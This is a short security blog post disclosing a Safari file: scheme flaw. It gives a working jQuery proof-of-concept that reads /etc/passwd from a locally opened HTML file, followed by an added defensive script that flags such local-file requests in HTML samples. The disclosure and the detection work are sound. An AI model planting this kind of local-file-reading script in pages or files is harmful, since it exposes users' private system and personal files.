Hacks and Incidents

Safari FILE: scheme security hole

It appears that Safari does not enforce any kind of access restrictions for XMLHTTPRequests on FILE: scheme URLs. As a result, any HTML file on the local file system that is opened in Safari can read any file that the user has access to (and, of course, it can upload those files too). Here’s a little proof-of-concept. Copy and paste this into a local HTML file and open it in Safari. It will display the contents of /etc/passwd.

<script src=https://code.jquery.com/jquery-2.1.3.min.js></script>
<script>
$.ajax({url: '/etc/passwd'}).done(function (s) {
  $('body').html('<pre>' + s + '</pre>');
});
</script>

Tested on Safari 7.1.4. FF and Chrome do not appear to have this problem.

UPDATE: Turns out this is a known problem:

https://community.rapid7.com/community/metasploit/blog/2013/04/25/abusing-safaris-webarchive-file-format
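
For triage of HTML files that arrive as downloads or attachments and would be opened from disk, the following added example (not part of the original post) flags script requests whose target is a file: URL or an absolute filesystem path. The function names, the regex heuristics and both sample pages are assumptions constructed for illustration; on pages served over HTTP a root-relative path is normal, so this only makes sense for files destined for a file: origin.

```javascript
// Added example, not from the original post: heuristic triage for HTML files
// that will be opened from disk. Sample pages below are constructed.
const SCRIPT_BLOCK = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
// Request APIs whose arguments are inspected: jQuery helpers, XHR open, fetch.
const REQUEST_CALL = /(\$\.(?:ajax|get|post)|\.open|\bfetch)\s*\(/g;
const STRING_LITERAL = /(['"`])((?:\\.|(?!\1).)*?)\1/g;

// On a file: origin "/etc/x" resolves to file:///etc/x, so absolute paths
// count as local targets; protocol-relative "//host/x" does not.
function isLocalTarget(url) {
  return /^file:/i.test(url) || /^\/[^\/]/.test(url);
}

// Text of the argument list that starts at `start` (just past the "(").
function argumentText(src, start) {
  let depth = 1;
  for (let i = start; i < src.length; i++) {
    if (src[i] === '(') depth++;
    else if (src[i] === ')' && --depth === 0) return src.slice(start, i);
  }
  return src.slice(start);
}

function findLocalFileRequests(html) {
  const findings = [];
  for (const script of html.matchAll(SCRIPT_BLOCK)) {
    const src = script[1];
    for (const call of src.matchAll(REQUEST_CALL)) {
      const args = argumentText(src, call.index + call[0].length);
      for (const lit of args.matchAll(STRING_LITERAL)) {
        if (isLocalTarget(lit[2])) findings.push({ api: call[1], target: lit[2] });
      }
    }
  }
  return findings;
}

const SAMPLE_SUSPICIOUS = `<script>
$.ajax({url: '/etc/passwd'}).done(function (s) { $('body').text(s); });
var x = new XMLHttpRequest();
x.open('GET', 'file:///Users/example/notes.txt');
</script>`;
const SAMPLE_BENIGN = `<script>
fetch('https://example.com/api/items').then(function (r) { return r.json(); });
$.get('//cdn.example.com/data.json');
</script>`;

console.log(findLocalFileRequests(SAMPLE_SUSPICIOUS));
console.log(findLocalFileRequests(SAMPLE_BENIGN));
```

The match is purely textual, so a URL assembled at runtime from string fragments will not be reported; treat a clean result as "nothing obvious", not as proof the file is safe to open.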
